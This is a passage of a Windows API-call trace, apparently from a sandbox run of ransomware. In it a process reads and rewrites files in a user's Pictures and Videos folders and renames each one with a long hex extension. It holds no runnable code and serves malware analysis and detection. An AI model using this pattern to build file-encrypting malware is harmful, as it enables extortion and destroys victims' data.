returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg.1A6652A39428A465BA3A771C08C911B8C7B4BD0160AF8DCCCAE6ABAEA7681D0F" [0168.707] GetProcessHeap () returned 0x270000 [0168.707] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14e) returned 0x42fbdd8 [0168.707] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x73dfc44, FileInformation=0x42fbdd8, Length=0x14e, FileInformationClass=0xa) returned 0x0 [0168.725] CloseHandle (hObject=0x5b8) returned 1 [0168.726] GetProcessHeap () returned 0x270000 [0168.727] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0168.727] RtlInterlockedCompareExchange64 () returned 0x1 [0168.727] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.730] ReadFile (in: hFile=0x5b8, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0168.731] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.731] WriteFile (in: hFile=0x5b8, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0168.736] RtlInterlockedCompareExchange64 () returned 0x0 [0168.736] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.030] ReadFile (in: hFile=0x598, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0169.030] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.031] WriteFile (in: hFile=0x5a8, lpBuffer=0x75526e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75325a8 | out: lpBuffer=0x75526e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75325a8) returned 1 [0169.036] RtlInterlockedCompareExchange64 () returned 0x0 [0169.036] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.036] WriteFile (in: hFile=0x5c4, lpBuffer=0x757a838*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a700 | out: lpBuffer=0x757a838*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a700) returned 1 [0169.038] RtlInterlockedCompareExchange64 () returned 0x1 [0169.038] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.039] WriteFile (in: hFile=0x5c8, lpBuffer=0x76d9030*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8) returned 1 [0169.041] RtlInterlockedCompareExchange64 () returned 0x2 [0169.041] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.042] WriteFile (in: hFile=0x5d0, lpBuffer=0x7701188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050) returned 1 [0169.043] RtlInterlockedCompareExchange64 () returned 0x3 [0169.044] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.044] WriteFile (in: hFile=0x5d4, lpBuffer=0x77292e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8) returned 1 [0169.047] RtlInterlockedCompareExchange64 () returned 0x4 [0169.047] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.048] WriteFile (in: hFile=0x5ac, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0169.050] RtlInterlockedCompareExchange64 () returned 0x5 [0169.050] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.050] WriteFile (in: hFile=0x4a8, lpBuffer=0x76292e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76091a8 | out: lpBuffer=0x76292e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76091a8) returned 1 [0169.051] RtlInterlockedCompareExchange64 () returned 0x6 [0169.051] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.051] WriteFile (in: hFile=0x5e4, lpBuffer=0x7651438*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7631300 | out: lpBuffer=0x7651438*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7631300) returned 1 [0169.053] RtlInterlockedCompareExchange64 () returned 0x7 [0169.053] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.053] WriteFile (in: hFile=0x5dc, lpBuffer=0x7679590*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7659458 | out: lpBuffer=0x7679590*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7659458) returned 1 [0169.054] RtlInterlockedCompareExchange64 () returned 0x8 [0169.054] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.055] WriteFile (in: hFile=0x5e0, lpBuffer=0x77a1298*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7781160 | out: lpBuffer=0x77a1298*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7781160) returned 1 [0169.058] RtlInterlockedCompareExchange64 () returned 0x9 [0169.058] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.058] WriteFile (in: hFile=0x304, lpBuffer=0x77c93f0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77a92b8 | out: lpBuffer=0x77c93f0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77a92b8) returned 1 [0169.060] RtlInterlockedCompareExchange64 () returned 0xa [0169.060] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.060] WriteFile (in: hFile=0x5c0, lpBuffer=0x77f1548*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77d1410 | out: lpBuffer=0x77f1548*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77d1410) returned 1 [0169.062] RtlInterlockedCompareExchange64 () returned 0xb [0169.062] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.062] WriteFile (in: hFile=0x5bc, lpBuffer=0x78196a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77f9568 | out: lpBuffer=0x78196a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77f9568) returned 1 [0169.064] RtlInterlockedCompareExchange64 () returned 0xc [0169.064] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.065] WriteFile (in: hFile=0x5e8, lpBuffer=0x78417f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78216c0 | out: lpBuffer=0x78417f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78216c0) returned 1 [0169.066] RtlInterlockedCompareExchange64 () returned 0xd [0169.067] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.067] WriteFile (in: hFile=0x5ec, lpBuffer=0x7869950*, nNumberOfBytesToWrite=0x3800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7849818 | out: lpBuffer=0x7869950*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7849818) returned 1 [0169.068] RtlInterlockedCompareExchange64 () returned 0xe [0169.068] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.069] WriteFile (in: hFile=0x5f0, lpBuffer=0x7891aa8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7871970 | out: lpBuffer=0x7891aa8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7871970) returned 1 [0169.071] RtlInterlockedCompareExchange64 () returned 0xf [0169.071] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.071] WriteFile (in: hFile=0x5f4, lpBuffer=0x78b9c00*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7899ac8 | out: lpBuffer=0x78b9c00*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7899ac8) returned 1 [0169.073] RtlInterlockedCompareExchange64 () returned 0x10 [0169.073] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.073] WriteFile (in: hFile=0x5b4, lpBuffer=0x78e1d58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78c1c20 | out: lpBuffer=0x78e1d58*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78c1c20) returned 1 [0169.075] RtlInterlockedCompareExchange64 () returned 0x11 [0169.075] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.075] WriteFile (in: hFile=0x5d8, lpBuffer=0x7909eb0*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78e9d78 | out: lpBuffer=0x7909eb0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78e9d78) returned 1 [0169.077] RtlInterlockedCompareExchange64 () returned 0x12 [0169.077] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.077] WriteFile (in: hFile=0x598, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0169.080] RtlInterlockedCompareExchange64 () returned 0x13 [0169.080] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.080] WriteFile (in: hFile=0x58c, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x4c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0169.082] RtlInterlockedCompareExchange64 () returned 0x14 [0169.082] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.082] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x7532658, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7532658, ReturnLength=0x73dfc54) returned 0x0 [0169.083] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv", lpString2=".40D562385B091262DA4A8D354C00AD020242811ECFC5C3CEE1AFDE510F948F6B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv.40D562385B091262DA4A8D354C00AD020242811ECFC5C3CEE1AFDE510F948F6B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv.40D562385B091262DA4A8D354C00AD020242811ECFC5C3CEE1AFDE510F948F6B" [0169.083] GetProcessHeap () returned 0x270000 [0169.084] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x174) returned 0x427b320 [0169.084] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x73dfc44, FileInformation=0x427b320, Length=0x174, FileInformationClass=0xa) returned 0x0 [0169.086] CloseHandle (hObject=0x5a8) returned 1 [0169.087] GetProcessHeap () returned 0x270000 [0169.088] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75325a8 | out: hHeap=0x270000) returned 1 [0169.088] RtlInterlockedCompareExchange64 () returned 0x15 [0169.088] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.089] NtQueryObject (in: Handle=0x5c4, ObjectInformationClass=0x1, ObjectInformation=0x755a7b0, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x755a7b0, ReturnLength=0x73dfc54) returned 0x0 [0169.090] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4", lpString2=".648094A637C345B24447E4B8016FF3295BD7714D9C103ABF3EDC2AF93F931507" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4.648094A637C345B24447E4B8016FF3295BD7714D9C103ABF3EDC2AF93F931507") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4.648094A637C345B24447E4B8016FF3295BD7714D9C103ABF3EDC2AF93F931507" [0169.090] GetProcessHeap () returned 0x270000 [0169.090] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16c) returned 0x7733310 [0169.090] NtSetInformationFile (FileHandle=0x5c4, IoStatusBlock=0x73dfc44, FileInformation=0x7733310, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0169.092] CloseHandle (hObject=0x5c4) returned 1 [0169.093] GetProcessHeap () returned 0x270000 [0169.094] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a700 | out: hHeap=0x270000) returned 1 [0169.094] RtlInterlockedCompareExchange64 () returned 0x14 [0169.094] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.095] NtQueryObject (in: Handle=0x5c8, ObjectInformationClass=0x1, ObjectInformation=0x76b8fa8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76b8fa8, ReturnLength=0x73dfc54) returned 0x0 [0169.096] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi", lpString2=".40194D75F132EFFF11CC8A4C4D1B02A9F17BF041A0C6CDED0F8B496644D1E01C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi.40194D75F132EFFF11CC8A4C4D1B02A9F17BF041A0C6CDED0F8B496644D1E01C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi.40194D75F132EFFF11CC8A4C4D1B02A9F17BF041A0C6CDED0F8B496644D1E01C" [0169.096] GetProcessHeap () returned 0x270000 [0169.096] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x172) returned 0x427b4a8 [0169.096] NtSetInformationFile (FileHandle=0x5c8, IoStatusBlock=0x73dfc44, FileInformation=0x427b4a8, Length=0x172, FileInformationClass=0xa) returned 0x0 [0169.098] CloseHandle (hObject=0x5c8) returned 1 [0169.099] GetProcessHeap () returned 0x270000 [0169.100] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76b8ef8 | out: hHeap=0x270000) returned 1 [0169.100] RtlInterlockedCompareExchange64 () returned 0x13 [0169.100] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.100] NtQueryObject (in: Handle=0x5d0, ObjectInformationClass=0x1, ObjectInformation=0x76e1100, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76e1100, ReturnLength=0x73dfc54) returned 0x0 [0169.102] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv", lpString2=".B63045B8F937A3B595DF57C9DF31535545D9120036C0028E193A8B0C423B6069" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv.B63045B8F937A3B595DF57C9DF31535545D9120036C0028E193A8B0C423B6069") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv.B63045B8F937A3B595DF57C9DF31535545D9120036C0028E193A8B0C423B6069" [0169.102] GetProcessHeap () returned 0x270000 [0169.102] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x166) returned 0x7421800 [0169.102] NtSetInformationFile (FileHandle=0x5d0, IoStatusBlock=0x73dfc44, FileInformation=0x7421800, Length=0x166, FileInformationClass=0xa) returned 0x0 [0169.105] CloseHandle (hObject=0x5d0) returned 1 [0169.106] GetProcessHeap () returned 0x270000 [0169.107] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76e1050 | out: hHeap=0x270000) returned 1 [0169.107] RtlInterlockedCompareExchange64 () returned 0x12 [0169.107] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.107] NtQueryObject (in: Handle=0x5d4, ObjectInformationClass=0x1, ObjectInformation=0x7709258, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7709258, ReturnLength=0x73dfc54) returned 0x0 [0169.109] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi", lpString2=".AB561EBB344AFD7BB98F6479FA3C8C04BE5748BF64BE4DCD4BA5826CC5578327" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi.AB561EBB344AFD7BB98F6479FA3C8C04BE5748BF64BE4DCD4BA5826CC5578327") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi.AB561EBB344AFD7BB98F6479FA3C8C04BE5748BF64BE4DCD4BA5826CC5578327" [0169.109] GetProcessHeap () returned 0x270000 [0169.109] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x7421978 [0169.109] NtSetInformationFile (FileHandle=0x5d4, IoStatusBlock=0x73dfc44, FileInformation=0x7421978, Length=0x168, FileInformationClass=0xa) returned 0x0 [0169.111] CloseHandle (hObject=0x5d4) returned 1 [0169.111] GetProcessHeap () returned 0x270000 [0169.113] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77091a8 | out: hHeap=0x270000) returned 1 [0169.125] RtlInterlockedCompareExchange64 () returned 0x11 [0169.125] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.125] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x75e00f8, ReturnLength=0x73dfc54) returned 0x0 [0169.126] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv", lpString2=".9294E5B187858D8756C37628C0FCE76F38B3D8FBD37641E49F2B0175814B1A16" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv.9294E5B187858D8756C37628C0FCE76F38B3D8FBD37641E49F2B0175814B1A16") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv.9294E5B187858D8756C37628C0FCE76F38B3D8FBD37641E49F2B0175814B1A16" [0169.126] GetProcessHeap () returned 0x270000 [0169.126] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10e) returned 0x4267c88 [0169.127] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x4267c88, Length=0x10e, FileInformationClass=0xa) returned 0x0 [0169.129] CloseHandle (hObject=0x5ac) returned 1 [0169.129] GetProcessHeap () returned 0x270000 [0169.131] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0169.131] RtlInterlockedCompareExchange64 () returned 0x10 [0169.131] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 